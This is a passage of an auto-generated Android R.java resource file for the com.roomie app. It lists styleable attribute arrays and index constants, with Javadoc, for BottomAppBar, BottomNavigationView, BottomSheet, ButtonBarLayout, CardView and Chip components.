#BottomAppBar_fabCradleRoundedCornerRadius @see #BottomAppBar_fabCradleVerticalOffset @see #BottomAppBar_hideOnScroll */ public static final int[] BottomAppBar = { 0x7f010122, 0x7f01014d, 0x7f01014e, 0x7f01014f, 0x7f010150, 0x7f010151 }; /** <p> @attr description Tint to apply to the background. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:backgroundTint */ public static final int BottomAppBar_backgroundTint = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#fabAlignmentMode} attribute's value can be found in the {@link #BottomAppBar} array. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>center</code></td><td>0</td><td></td></tr> <tr><td><code>end</code></td><td>1</td><td></td></tr> </table> @attr name com.roomie:fabAlignmentMode */ public static final int BottomAppBar_fabAlignmentMode = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#fabCradleMargin} attribute's value can be found in the {@link #BottomAppBar} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:fabCradleMargin */ public static final int BottomAppBar_fabCradleMargin = 2; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#fabCradleRoundedCornerRadius} attribute's value can be found in the {@link #BottomAppBar} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:fabCradleRoundedCornerRadius */ public static final int BottomAppBar_fabCradleRoundedCornerRadius = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#fabCradleVerticalOffset} attribute's value can be found in the {@link #BottomAppBar} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:fabCradleVerticalOffset */ public static final int BottomAppBar_fabCradleVerticalOffset = 4; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#hideOnScroll} attribute's value can be found in the {@link #BottomAppBar} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:hideOnScroll */ public static final int BottomAppBar_hideOnScroll = 5; /** Attributes that can be used with a BottomNavigationView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #BottomNavigationView_elevation com.roomie:elevation}</code></td><td> Elevation for the action bar itself </td></tr> <tr><td><code>{@link #BottomNavigationView_itemBackground com.roomie:itemBackground}</code></td><td></td></tr> <tr><td><code>{@link #BottomNavigationView_itemHorizontalTranslationEnabled com.roomie:itemHorizontalTranslationEnabled}</code></td><td></td></tr> <tr><td><code>{@link #BottomNavigationView_itemIconSize com.roomie:itemIconSize}</code></td><td></td></tr> <tr><td><code>{@link #BottomNavigationView_itemIconTint com.roomie:itemIconTint}</code></td><td></td></tr> <tr><td><code>{@link #BottomNavigationView_itemTextAppearanceActive com.roomie:itemTextAppearanceActive}</code></td><td></td></tr> <tr><td><code>{@link #BottomNavigationView_itemTextAppearanceInactive com.roomie:itemTextAppearanceInactive}</code></td><td></td></tr> <tr><td><code>{@link #BottomNavigationView_itemTextColor com.roomie:itemTextColor}</code></td><td></td></tr> <tr><td><code>{@link #BottomNavigationView_labelVisibilityMode com.roomie:labelVisibilityMode}</code></td><td></td></tr> <tr><td><code>{@link #BottomNavigationView_menu com.roomie:menu}</code></td><td></td></tr> </table> @see #BottomNavigationView_elevation @see #BottomNavigationView_itemBackground @see #BottomNavigationView_itemHorizontalTranslationEnabled @see #BottomNavigationView_itemIconSize @see #BottomNavigationView_itemIconTint @see #BottomNavigationView_itemTextAppearanceActive @see #BottomNavigationView_itemTextAppearanceInactive @see #BottomNavigationView_itemTextColor @see #BottomNavigationView_labelVisibilityMode @see #BottomNavigationView_menu */ public static final int[] BottomNavigationView = { 0x7f010045, 0x7f010152, 0x7f010153, 0x7f010154, 0x7f010155, 0x7f010156, 0x7f01019a, 0x7f01019b, 0x7f01019c, 0x7f01019d }; /** <p> @attr description Elevation for the action bar itself <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:elevation */ public static final int BottomNavigationView_elevation = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemBackground} attribute's value can be found in the {@link #BottomNavigationView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:itemBackground */ public static final int BottomNavigationView_itemBackground = 9; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemHorizontalTranslationEnabled} attribute's value can be found in the {@link #BottomNavigationView} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:itemHorizontalTranslationEnabled */ public static final int BottomNavigationView_itemHorizontalTranslationEnabled = 5; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemIconSize} attribute's value can be found in the {@link #BottomNavigationView} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:itemIconSize */ public static final int BottomNavigationView_itemIconSize = 2; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemIconTint} attribute's value can be found in the {@link #BottomNavigationView} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:itemIconTint */ public static final int BottomNavigationView_itemIconTint = 7; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemTextAppearanceActive} attribute's value can be found in the {@link #BottomNavigationView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:itemTextAppearanceActive */ public static final int BottomNavigationView_itemTextAppearanceActive = 4; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemTextAppearanceInactive} attribute's value can be found in the {@link #BottomNavigationView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:itemTextAppearanceInactive */ public static final int BottomNavigationView_itemTextAppearanceInactive = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemTextColor} attribute's value can be found in the {@link #BottomNavigationView} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:itemTextColor */ public static final int BottomNavigationView_itemTextColor = 8; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#labelVisibilityMode} attribute's value can be found in the {@link #BottomNavigationView} array. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>auto</code></td><td>-1</td><td></td></tr> <tr><td><code>selected</code></td><td>0</td><td></td></tr> <tr><td><code>labeled</code></td><td>1</td><td></td></tr> <tr><td><code>unlabeled</code></td><td>2</td><td></td></tr> </table> @attr name com.roomie:labelVisibilityMode */ public static final int BottomNavigationView_labelVisibilityMode = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#menu} attribute's value can be found in the {@link #BottomNavigationView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:menu */ public static final int BottomNavigationView_menu = 6; /** Attributes that can be used with a BottomSheetBehavior_Layout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #BottomSheetBehavior_Layout_behavior_fitToContents com.roomie:behavior_fitToContents}</code></td><td></td></tr> <tr><td><code>{@link #BottomSheetBehavior_Layout_behavior_hideable com.roomie:behavior_hideable}</code></td><td></td></tr> <tr><td><code>{@link #BottomSheetBehavior_Layout_behavior_peekHeight com.roomie:behavior_peekHeight}</code></td><td></td></tr> <tr><td><code>{@link #BottomSheetBehavior_Layout_behavior_skipCollapsed com.roomie:behavior_skipCollapsed}</code></td><td></td></tr> </table> @see #BottomSheetBehavior_Layout_behavior_fitToContents @see #BottomSheetBehavior_Layout_behavior_hideable @see #BottomSheetBehavior_Layout_behavior_peekHeight @see #BottomSheetBehavior_Layout_behavior_skipCollapsed */ public static final int[] BottomSheetBehavior_Layout = { 0x7f010157, 0x7f010158, 0x7f010159, 0x7f01015a }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#behavior_fitToContents} attribute's value can be found in the {@link #BottomSheetBehavior_Layout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:behavior_fitToContents */ public static final int BottomSheetBehavior_Layout_behavior_fitToContents = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#behavior_hideable} attribute's value can be found in the {@link #BottomSheetBehavior_Layout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:behavior_hideable */ public static final int BottomSheetBehavior_Layout_behavior_hideable = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#behavior_peekHeight} attribute's value can be found in the {@link #BottomSheetBehavior_Layout} array. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>May be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>auto</code></td><td>-1</td><td></td></tr> </table> @attr name com.roomie:behavior_peekHeight */ public static final int BottomSheetBehavior_Layout_behavior_peekHeight = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#behavior_skipCollapsed} attribute's value can be found in the {@link #BottomSheetBehavior_Layout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:behavior_skipCollapsed */ public static final int BottomSheetBehavior_Layout_behavior_skipCollapsed = 2; /** Attributes that can be used with a ButtonBarLayout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ButtonBarLayout_allowStacking com.roomie:allowStacking}</code></td><td> Whether to automatically stack the buttons when there is not enough space to lay them out side-by-side.</td></tr> </table> @see #ButtonBarLayout_allowStacking */ public static final int[] ButtonBarLayout = { 0x7f0100d8 }; /** <p> @attr description Whether to automatically stack the buttons when there is not enough space to lay them out side-by-side. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:allowStacking */ public static final int ButtonBarLayout_allowStacking = 0; /** Attributes that can be used with a CardView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #CardView_android_minHeight android:minHeight}</code></td><td> Workaround to read user defined minimum height </td></tr> <tr><td><code>{@link #CardView_android_minWidth android:minWidth}</code></td><td> Workaround to read user defined minimum width </td></tr> <tr><td><code>{@link #CardView_cardBackgroundColor com.roomie:cardBackgroundColor}</code></td><td> Background color for CardView.</td></tr> <tr><td><code>{@link #CardView_cardCornerRadius com.roomie:cardCornerRadius}</code></td><td> Corner radius for CardView.</td></tr> <tr><td><code>{@link #CardView_cardElevation com.roomie:cardElevation}</code></td><td> Elevation for CardView.</td></tr> <tr><td><code>{@link #CardView_cardMaxElevation com.roomie:cardMaxElevation}</code></td><td> Maximum Elevation for CardView.</td></tr> <tr><td><code>{@link #CardView_cardPreventCornerOverlap com.roomie:cardPreventCornerOverlap}</code></td><td> Add padding to CardView on v20 and before to prevent intersections between the Card content and rounded corners.</td></tr> <tr><td><code>{@link #CardView_cardUseCompatPadding com.roomie:cardUseCompatPadding}</code></td><td> Add padding in API v21+ as well to have the same measurements with previous versions.</td></tr> <tr><td><code>{@link #CardView_contentPadding com.roomie:contentPadding}</code></td><td> Inner padding between the edges of the Card and children of the CardView.</td></tr> <tr><td><code>{@link #CardView_contentPaddingBottom com.roomie:contentPaddingBottom}</code></td><td> Inner padding between the bottom edge of the Card and children of the CardView.</td></tr> <tr><td><code>{@link #CardView_contentPaddingLeft com.roomie:contentPaddingLeft}</code></td><td> Inner padding between the left edge of the Card and children of the CardView.</td></tr> <tr><td><code>{@link #CardView_contentPaddingRight com.roomie:contentPaddingRight}</code></td><td> Inner padding between the right edge of the Card and children of the CardView.</td></tr> <tr><td><code>{@link #CardView_contentPaddingTop com.roomie:contentPaddingTop}</code></td><td> Inner padding between the top edge of the Card and children of the CardView.</td></tr> </table> @see #CardView_android_minHeight @see #CardView_android_minWidth @see #CardView_cardBackgroundColor @see #CardView_cardCornerRadius @see #CardView_cardElevation @see #CardView_cardMaxElevation @see #CardView_cardPreventCornerOverlap @see #CardView_cardUseCompatPadding @see #CardView_contentPadding @see #CardView_contentPaddingBottom @see #CardView_contentPaddingLeft @see #CardView_contentPaddingRight @see #CardView_contentPaddingTop */ public static final int[] CardView = { 0x0101013f, 0x01010140, 0x7f01001e, 0x7f01001f, 0x7f010020, 0x7f010021, 0x7f010022, 0x7f010023, 0x7f010024, 0x7f010025, 0x7f010026, 0x7f010027, 0x7f010028 }; /** <p> @attr description Workaround to read user defined minimum height <p>This corresponds to the global attribute resource symbol {@link android.R.attr#minHeight}. @attr name android:minHeight */ public static final int CardView_android_minHeight = 1; /** <p> @attr description Workaround to read user defined minimum width <p>This corresponds to the global attribute resource symbol {@link android.R.attr#minWidth}. @attr name android:minWidth */ public static final int CardView_android_minWidth = 0; /** <p> @attr description Background color for CardView. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:cardBackgroundColor */ public static final int CardView_cardBackgroundColor = 2; /** <p> @attr description Corner radius for CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:cardCornerRadius */ public static final int CardView_cardCornerRadius = 3; /** <p> @attr description Elevation for CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:cardElevation */ public static final int CardView_cardElevation = 4; /** <p> @attr description Maximum Elevation for CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:cardMaxElevation */ public static final int CardView_cardMaxElevation = 5; /** <p> @attr description Add padding to CardView on v20 and before to prevent intersections between the Card content and rounded corners. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:cardPreventCornerOverlap */ public static final int CardView_cardPreventCornerOverlap = 7; /** <p> @attr description Add padding in API v21+ as well to have the same measurements with previous versions. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:cardUseCompatPadding */ public static final int CardView_cardUseCompatPadding = 6; /** <p> @attr description Inner padding between the edges of the Card and children of the CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentPadding */ public static final int CardView_contentPadding = 8; /** <p> @attr description Inner padding between the bottom edge of the Card and children of the CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentPaddingBottom */ public static final int CardView_contentPaddingBottom = 12; /** <p> @attr description Inner padding between the left edge of the Card and children of the CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentPaddingLeft */ public static final int CardView_contentPaddingLeft = 9; /** <p> @attr description Inner padding between the right edge of the Card and children of the CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentPaddingRight */ public static final int CardView_contentPaddingRight = 10; /** <p> @attr description Inner padding between the top edge of the Card and children of the CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentPaddingTop */ public static final int CardView_contentPaddingTop = 11; /** Attributes that can be used with a Chip. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #Chip_android_checkable android:checkable}</code></td><td></td></tr> <tr><td><code>{@link #Chip_android_ellipsize android:ellipsize}</code></td><td></td></tr> <tr><td><code>{@link #Chip_android_maxWidth android:maxWidth}</code></td><td></td></tr> <tr><td><code>{@link #Chip_android_text android:text}</code></td><td></td></tr> <tr><td><code>{@link #Chip_android_textAppearance android:textAppearance}</code></td><td></td></tr> <tr><td><code>{@link #Chip_checkedIcon com.roomie:checkedIcon}</code></td><td></td></tr> <tr><td><code>{@link #Chip_checkedIconEnabled com.roomie:checkedIconEnabled}</code></td><td></td></tr> <tr><td><code>{@link #Chip_checkedIconVisible com.roomie:checkedIconVisible}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipBackgroundColor com.roomie:chipBackgroundColor}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipCornerRadius com.roomie:chipCornerRadius}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipEndPadding com.roomie:chipEndPadding}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipIcon com.roomie:chipIcon}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipIconEnabled com.roomie:chipIconEnabled}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipIconSize com.roomie:chipIconSize}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipIconTint com.roomie:chipIconTint}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipIconVisible com.roomie:chipIconVisible}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipMinHeight com.roomie:chipMinHeight}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipStartPadding com.roomie:chipStartPadding}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipStrokeColor com.roomie:chipStrokeColor}</code></td><td></td></tr> <tr><td><code>{@link #Chip_chipStrokeWidth com.roomie:chipStrokeWidth}</code></td><td></td></tr> <tr><td><code>{@link #Chip_closeIcon com.roomie:closeIcon}</code></td><td> Close button icon </td></tr> <tr><td><code>{@link #Chip_closeIconEnabled com.roomie:closeIconEnabled}</code></td><td></td></tr> <tr><td><code>{@link #Chip_closeIconEndPadding com.roomie:closeIconEndPadding}</code></td><td></td></tr> <tr><td><code>{@link #Chip_closeIconSize com.roomie:closeIconSize}</code></td><td></td></tr> <tr><td><code>{@link #Chip_closeIconStartPadding com.roomie:closeIconStartPadding}</code></td><td></td></tr> <tr><td><code>{@link #Chip_closeIconTint com.roomie:closeIconTint}</code></td><td></td></tr> <tr><td><code>{@link #Chip_closeIconVisible com.roomie:closeIconVisible}</code></td><td></td></tr> <tr><td><code>{@link #Chip_hideMotionSpec com.roomie:hideMotionSpec}</code></td><td></td></tr> <tr><td><code>{@link #Chip_iconEndPadding com.roomie:iconEndPadding}</code></td><td></td></tr> <tr><td><code>{@link #Chip_iconStartPadding com.roomie:iconStartPadding}</code></td><td></td></tr> <tr><td><code>{@link #Chip_rippleColor com.roomie:rippleColor}</code></td><td></td></tr> <tr><td><code>{@link #Chip_showMotionSpec com.roomie:showMotionSpec}</code></td><td></td></tr> <tr><td><code>{@link #Chip_textEndPadding com.roomie:textEndPadding}</code></td><td></td></tr> <tr><td><code>{@link #Chip_textStartPadding com.roomie:textStartPadding}</code></td><td></td></tr> </table> @see #Chip_android_checkable @see #Chip_android_ellipsize @see #Chip_android_maxWidth @see #Chip_android_text @see #Chip_android_textAppearance @see #Chip_checkedIcon @see #Chip_checkedIconEnabled @see #Chip_checkedIconVisible @see #Chip_chipBackgroundColor @see #Chip_chipCornerRadius @see #Chip_chipEndPadding @see #Chip_chipIcon @see #Chip_chipIconEnabled @see #Chip_chipIconSize @see #Chip_chipIconTint @see #Chip_chipIconVisible @see #Chip_chipMinHeight @see #Chip_chipStartPadding @see #Chip_chipStrokeColor @see #Chip_chipStrokeWidth @see #Chip_closeIcon @see #Chip_closeIconEnabled @see #Chip_closeIconEndPadding @see #Chip_closeIconSize @see #Chip_closeIconStartPadding @see #Chip_closeIconTint @see #Chip_closeIconVisible @see #Chip_hideMotionSpec @see #Chip_iconEndPadding @see #Chip_iconStartPadding @see #Chip_rippleColor @see #Chip_showMotionSpec @see #Chip_textEndPadding @see #Chip_textStartPadding */ public static final int[] Chip = { 0x01010034, 0x010100ab, 0x0101011f, 0x0101014f, 0x010101e5, 0x7f0100fa, 0x7f01012d, 0x7f010131, 0x7f010133, 0x7f01015b, 0x7f01015c, 0x7f01015d, 0x7f01015e, 0x7f01015f, 0x7f010160, 0x7f010161, 0x7f010162, 0x7f010163, 0x7f010164, 0x7f010165, 0x7f010166, 0x7f010167, 0x7f010168, 0x7f010169, 0x7f01016a, 0x7f01016b, 0x7f01016c, 0x7f01016d, 0x7f01016e, 0x7f01016f, 0x7f010170, 0x7f010171, 0x7f010172, 0x7f010173 }; /** <p>This symbol is the offset where the {@link android.R.attr#checkable} attribute's value can be found in the {@link #Chip} array. @attr name android:checkable */ public static final int Chip_android_checkable = 4; /** <p>This symbol is the offset where the {@link android.R.attr#ellipsize} attribute's value can be found in the {@link #Chip} array. @attr name android:ellipsize */ public static final int Chip_android_ellipsize = 1; /** <p>This symbol is the offset where the {@link android.R.attr#maxWidth} attribute's value can be found in the {@link #Chip} array. @attr name android:maxWidth */ public static final int Chip_android_maxWidth = 2; /** <p>This symbol is the offset where the {@link android.R.attr#text} attribute's value can be found in the {@link #Chip} array. @attr name android:text */ public static final int Chip_android_text = 3; /** <p>This symbol is the offset where the {@link android.R.attr#textAppearance} attribute's value can be found in the {@link #Chip} array. @attr name android:textAppearance */ public static final int Chip_android_textAppearance = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#checkedIcon} attribute's value can be found in the {@link #Chip} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:checkedIcon */ public static final int Chip_checkedIcon = 25; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#checkedIconEnabled} attribute's value can be found in the {@link #Chip} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be 